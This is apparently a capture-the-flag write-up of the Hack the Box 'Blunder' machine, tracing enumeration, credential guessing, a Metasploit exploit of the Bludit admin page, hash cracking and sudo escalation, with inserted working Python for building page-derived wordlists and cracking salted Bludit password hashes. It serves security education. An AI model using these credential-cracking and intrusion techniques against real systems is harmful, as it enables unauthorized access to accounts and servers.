Hack the Box: Blunder

Samantha
5 min read · Oct 18, 2020

This is the first machine I’ve done on HTB. I’ve been sticking to the challenges for a while, because I wanted to get a bit better before I moved forward. I figured the easiest machine with the most solves would be a good start, lol.

Also, this is the first time I’ve used Parrot and I am finding that I really like it!

I started off by enumerating the machine with an nmap scan:

Looks like FTP (port 21) is closed and there is a web server on port 80. I’m going to check out the web page.

Hmm, looks like a webpage for someone to dump random info they want to save:

Most of the links are broken and go nowhere, except the “1996” one that gives you facts about historical computer events.

I started gobuster and got an admin page (it’s still running, so this isn’t a complete scan yet).

Let’s explore that:

So I need a username here. Back on the first page, I remember seeing something that looked weird as I read through everything.

This person obviously loves Roland Deschain since they are saying he is the BEST fictional character in the series. Maybe they are using it as a username or password? Also, the way it is pushed together could be just a typo, but it could also be a hint?

I tried getting into the admin login using RolandDeschain as the username, utilizing random stuff I found on the page as potential passwords, but failed. I didn’t want to waste too much time doing it by hand, so I stored Roland in my memory and moved on.

I started looking for some type of exploit. There is indeed an exploit for that admin page:

We get some Metasploit instructions by checking out the rapid7 link. And I KNOW that Metasploit use is sometimes frowned upon within the HTB community, but…just let me live my life.

I will need a username and password before I attempt this exploit:

At this point I checked on gobuster and it was complete:

After making my way to the interesting-looking /todo.txt file, I see it mentions a guy named Fergus:

So we now have a user. I headed back to the admin page and considered using hydra or something similar to brute-force the password, but eventually tried the run-together name I had noticed on the front page, RolandDeschain, as the password.

This granted me access to the admin dashboard:

I also set the user as “fergus” back at our exploit:

And then our password:

Now if I HADN’T used RolandDeschain first? I think I would have been in for some long-winded bruteforcing, so I consider myself very lucky here. I don’t even know what word list that would be in?

After some thought, I think the strategy would have been to make a custom word list from the content of the web page, since the password was sitting right there in the text. I know of a tool called CeWL which can do that (something like cewl -d 2 -m 5 -w blunder.txt http://target/ spiders the site two links deep and keeps words of at least five characters). It’s preinstalled on Kali.
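To show what that custom word list would actually look like, here is an added example (my own code, not the author’s and not CeWL itself) that does the same job on a page you already have: it strips the HTML, keeps words of a minimum length, and, because the hint on Blunder was a run-together name, also splits CamelCase tokens into their parts so both "RolandDeschain" and "Roland" end up as candidates. The HTML below is constructed for the example and is not the real page.

```python
import re
from html.parser import HTMLParser


class _TextExtractor(HTMLParser):
    """Collect visible text only, skipping <script> and <style> bodies."""

    def __init__(self):
        super().__init__()
        self._skip = 0
        self.chunks = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.chunks.append(data)


def page_text(html: str) -> str:
    """Return the visible text of an HTML document as one string."""
    parser = _TextExtractor()
    parser.feed(html)
    return " ".join(parser.chunks)


WORD_RE = re.compile(r"[A-Za-z][A-Za-z0-9]*")   # alphanumeric tokens starting with a letter
CAMEL_RE = re.compile(r"[A-Z][a-z]+")            # "RolandDeschain" -> ["Roland", "Deschain"]


def build_wordlist(html: str, min_len: int = 5) -> list:
    """CeWL-style candidate list: unique words from the page, in first-seen order.

    CamelCase tokens contribute themselves and their parts, so a name typed
    without a space still yields the individual names too.
    """
    seen = {}
    for word in WORD_RE.findall(page_text(html)):
        candidates = [word]
        parts = CAMEL_RE.findall(word)
        if len(parts) > 1 and "".join(parts) == word:
            candidates.extend(parts)
        for cand in candidates:
            if len(cand) >= min_len and cand not in seen:
                seen[cand] = None
    return list(seen)


# Constructed sample page (hypothetical, stands in for the real Blunder front page).
SAMPLE_HTML = """
<html><head><title>Stephen King is the BEST</title>
<script>var secret = "scriptonly";</script></head>
<body><p>Roland Deschain is the BEST fictional character in the series.
RolandDeschain carries the guns of his father.</p></body></html>
"""

if __name__ == "__main__":
    for candidate in build_wordlist(SAMPLE_HTML):
        print(candidate)
```

Feed the output to hydra (or whatever you point at the login form) as the password list; the CamelCase split is what turns one lucky observation into a repeatable step.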

Anyways, let’s keep working on our exploit. I set the RHOST (target ip):

Time for the moment of truth…

Nice.

From here I made my way to the home directory of a user named Hugo, which holds the user.txt file. However, I do not have the correct permissions to read it:

After exploring around the file system for quite some time, I managed to find something at:

/var/www/bludit-3.10.0a/bl-content/databases/users.php

Here we have a password hash for Hugo. For this I just used CrackStation, which made quick work of it. (CrackStation only knows unsalted hashes, so this worked because the stored value was a plain SHA-1 of the password; Bludit normally stores sha1(password + salt) with the salt right next to the hash in the same file, and a salted entry would need hashcat or a small script that appends the salt.)

So now we have Hugo’s password, Password120.
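As an added example (my code, not the author’s and not Bludit’s), here is the offline version of that CrackStation step: parse a Bludit users database, which is a PHP guard line followed by JSON, then try each candidate password against a user’s stored hash, appending the salt when the entry has one. The users file below is constructed for the example with made-up salts and hashes generated on the fly; it is not the real users.php from the box, and the "admin" password in it is invented.

```python
import hashlib
import json
from typing import Iterable, Optional


def sha1_hex(data: str) -> str:
    return hashlib.sha1(data.encode("utf-8")).hexdigest()


def bludit_hash(password: str, salt: str = "") -> str:
    """Bludit stores sha1(password . salt); with an empty salt this is a plain SHA-1."""
    return sha1_hex(password + salt)


def load_bludit_db(text: str) -> dict:
    """Parse a bl-content/databases/*.php file: drop the PHP guard line, parse the JSON."""
    body = "\n".join(
        line for line in text.splitlines() if not line.lstrip().startswith("<?php")
    )
    return json.loads(body)


def crack_user(db: dict, username: str, candidates: Iterable[str]) -> Optional[str]:
    """Return the candidate matching the user's stored hash (salt-aware), or None."""
    entry = db[username]
    target = entry["password"].lower()
    salt = entry.get("salt", "")
    for password in candidates:
        if bludit_hash(password, salt) == target:
            return password
    return None


def make_sample_users_php() -> str:
    """Constructed users.php: 'hugo' unsalted (as on the box), 'admin' salted (hypothetical)."""
    users = {
        "admin": {
            "nickname": "Admin",
            "salt": "c0nstructedsalt",
            "password": bludit_hash("NotOnThePage1", "c0nstructedsalt"),
        },
        "hugo": {
            "nickname": "Hugo",
            "salt": "",
            "password": bludit_hash("Password120"),
        },
    }
    return "<?php defined('BLUDIT') or die('Bludit CMS.'); ?>\n" + json.dumps(users, indent=2)


if __name__ == "__main__":
    db = load_bludit_db(make_sample_users_php())
    wordlist = ["password", "RolandDeschain", "Password120"]
    print("hugo:", crack_user(db, "hugo", wordlist))
    print("admin:", crack_user(db, "admin", wordlist))
```

Because the salt is read from the entry itself, the same loop handles both the unsalted hash CrackStation cracked and a properly salted one; the admin lookup returns None with this word list only because the constructed password is not in it.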

I changed users and made my way back to the user.txt file:

At this point I got stuck because of the limitations of the shell I was using. As I was trying to progress, I kept getting the “sudo: no tty present and no askpass program specified” error, which is sudo refusing to prompt for a password because the shell has no terminal attached.

After some research, I found THIS BLOG, which helped me fix my situation by spawning a pseudo-terminal:

python -c 'import pty; pty.spawn("/bin/bash")'

That is enough for sudo to ask for a password. For a fully usable shell (Ctrl-C, tab completion, line editing) you would also background it with Ctrl-Z, run stty raw -echo; fg on your own terminal, and set export TERM=xterm, but the pty alone unblocked sudo here.

At this point, almost in the throes of my first root victory, my Meterpreter session died…

I started from the top fresh, which was good, because I could take a better screenshot of the process without the 300 errors and missteps.

So this was DEFINITELY a learning experience. I spent basically an entire day on what was supposed to be an easy box. I still had a lot of fun though, and can’t wait to try more.

Oh, and I graduated to Script Kiddie when I solved this!

Happy Hacking! ❤

Samantha

CTF writeups to facilitate cyber education and help me earn CPEs